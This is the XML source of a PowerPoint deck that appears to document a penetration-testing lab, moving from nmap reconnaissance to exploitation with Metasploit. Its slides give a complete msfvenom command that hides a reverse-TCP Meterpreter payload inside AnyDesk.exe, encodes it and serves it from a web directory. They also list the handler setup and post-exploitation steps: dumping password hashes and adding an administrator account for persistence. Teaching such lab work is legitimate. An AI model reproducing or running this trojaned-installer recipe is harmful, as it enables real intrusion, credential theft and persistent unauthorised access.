      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222563" y="5017651"/>
            <a:ext cx="3586163" cy="661392"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2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11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435923" y="5177671"/>
            <a:ext cx="3159443" cy="341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arp -a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233160" y="5919073"/>
            <a:ext cx="3564969" cy="136540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nmap -sn</a:t>
            </a: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performs a ping scan to identify online hosts, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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arp -a</a:t>
            </a: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displays the ARP cache, mapping IP to MAC addresses.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0326291" y="3542824"/>
            <a:ext cx="2667357" cy="3333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Full Port Scan:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10326291" y="4116229"/>
            <a:ext cx="3564969" cy="1002744"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10315694" y="4116229"/>
            <a:ext cx="3586163" cy="1002744"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10529054" y="4276249"/>
            <a:ext cx="3159443" cy="6827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nmap -p 1-65535 -T4 -A -v 192.168.1.100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10326291" y="5359003"/>
            <a:ext cx="3564969" cy="17067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This exhaustive Nmap scan checks all 65535 TCP ports, revealing every potential entry point, along with aggressive service and OS detection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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571500"/>
            <a:ext cx="5856605" cy="17462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35" y="2219960"/>
            <a:ext cx="5856605" cy="92392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35" y="3143885"/>
            <a:ext cx="5856605" cy="4544695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7684651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77069" y="810181"/>
            <a:ext cx="7962662" cy="10548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Exploitation: Crafting a Backdoor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077069" y="1772126"/>
            <a:ext cx="7962662" cy="5400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We utilized Msfvenom, a powerful payload generator, to create malicious executables for initial access.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6077069" y="2755106"/>
            <a:ext cx="7962662" cy="2429708"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4516"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077069" y="2732246"/>
            <a:ext cx="7962662" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 77522"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9805273" y="2501979"/>
            <a:ext cx="506254" cy="506254"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 180621"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill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7078" y="2628543"/>
            <a:ext cx="202525" cy="2531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268641" y="3176945"/>
            <a:ext cx="2888456" cy="2637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Standalone Backdoor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6268641" y="3541871"/>
            <a:ext cx="7579519" cy="8101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msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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6666 -x /home/kali/Downloads/AnyDesk.exe -k -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/Anydesk.exe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6268641" y="4453176"/>
            <a:ext cx="7579519" cy="5400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Generates a standalone executable, creating a reverse TCP Meterpreter shell upon execution on the victim.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077069" y="5606653"/>
            <a:ext cx="7962662" cy="2159675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5081"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF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13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077069" y="5583793"/>
            <a:ext cx="7962662" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 77522"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9805273" y="5353526"/>
            <a:ext cx="506254" cy="506254"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 180621"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill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7078" y="5480090"/>
            <a:ext cx="202525" cy="25312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6268641" y="6028492"/>
            <a:ext cx="3021925" cy="2637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</a:rPr>
              <a:t>In Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333F70"/>
              </a:solidFill>
              <a:latin typeface="Unbounded Bold" pitchFamily="34" charset="0"/>
              <a:ea typeface="Unbounded Bold" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>IP of kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/Anydesk.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268641" y="6393418"/>
            <a:ext cx="7579519" cy="5400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18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268641" y="7034689"/>
            <a:ext cx="7579519" cy="5400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35" y="2732405"/>
            <a:ext cx="5992495" cy="2942590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7731641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0307" y="654050"/>
            <a:ext cx="9666446" cy="4913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Gaining Access: Setting up the Listener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50307" y="1282700"/>
            <a:ext cx="13529786" cy="2515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With the backdoor prepared, we configured a handler in Metasploit to catch the incoming reverse shell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connection from the victim.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550307" y="1905079"/>
            <a:ext cx="3284339" cy="24562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Metasploit Listener Setup:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550307" y="2246233"/>
            <a:ext cx="6573083" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542449" y="2246233"/>
            <a:ext cx="6588800" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699611" y="2364105"/>
            <a:ext cx="6274475" cy="2515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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550307" y="2910364"/>
            <a:ext cx="6573083" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542449" y="2910364"/>
            <a:ext cx="6588800" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699611" y="3028236"/>
            <a:ext cx="6274475" cy="2515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use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550307" y="3574494"/>
            <a:ext cx="6573083" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542449" y="3574494"/>
            <a:ext cx="6588800" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699611" y="3692366"/>
            <a:ext cx="6274475" cy="2515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set PAYLOAD windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550307" y="4238625"/>
            <a:ext cx="6573083" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542449" y="4238625"/>
            <a:ext cx="6588800" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699611" y="4356497"/>
            <a:ext cx="6274475" cy="2515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set lhost 192.168.1.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550307" y="4902756"/>
            <a:ext cx="6573083" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542449" y="4902756"/>
            <a:ext cx="6588800" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699611" y="5020628"/>
            <a:ext cx="6274475" cy="2515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set lport 6666</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550307" y="5566886"/>
            <a:ext cx="6573083" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542449" y="5566886"/>
            <a:ext cx="6588800" cy="487323"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699611" y="5684758"/>
            <a:ext cx="6274475" cy="2515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exploit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550307" y="6231017"/>
            <a:ext cx="6573083" cy="7547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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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exploit/multi/handler</a:t>
            </a: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module is a generic payload handler that listens for incoming connections. Once the victim executes the backdoor, a Meterpreter session is established.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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411720" y="2251710"/>
            <a:ext cx="7219315" cy="3808095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7677666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7738" y="571619"/>
            <a:ext cx="13310473" cy="117824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Post-Exploitation: Information Gathering &amp; Persistence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37103" y="1351280"/>
            <a:ext cx="13310473" cy="60340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Once Meterpreter access was established, we gathered system information, dumped password hashes, and created a new administrative user for persistence.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637103" y="2171184"/>
            <a:ext cx="6560939" cy="2263497"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4848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441523" y="2171184"/>
            <a:ext cx="91440" cy="2263497"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 86613"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939879" y="2290445"/>
            <a:ext cx="2357080" cy="2946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System Details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939879" y="3152259"/>
            <a:ext cx="6069687" cy="3017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sysinfo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939879" y="2734588"/>
            <a:ext cx="6069687" cy="3017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getuid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939879" y="3569772"/>
            <a:ext cx="6069687" cy="60340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These commands provide crucial details about the compromised system, including OS, architecture, and current user privileges.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441523" y="5116314"/>
            <a:ext cx="91440" cy="2263497"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 86613"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="26A688"/>
          </a:solidFill>
        </p:spPr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05" y="5116195"/>
            <a:ext cx="6614795" cy="2272665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-119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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7657981"/>
            <a:ext cx="14630400" cy="571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18.7843307086614,&quot;left&quot;:43.696850393700785,&quot;top&quot;:330.8625196850394,&quot;width&quot;:1064.5968503937008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95.25314960629922,&quot;left&quot;:42.71251968503937,&quot;top&quot;:229.1625196850394,&quot;width&quot;:518.8031496062993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926</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>123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Open Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Viner Hand ITC</vt:lpstr>
      <vt:lpstr>Unbounded Bold</vt:lpstr>
      <vt:lpstr>Wingdings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Krishna Mahajan</dc:creator>
  <cp:lastModifiedBy>danish dubey</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-29T06:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-31T07:51:09Z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EAA47E87025A44DBA46A85099C5EC901_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.21931</vt:lpwstr>
  </property>
</Properties>
</file>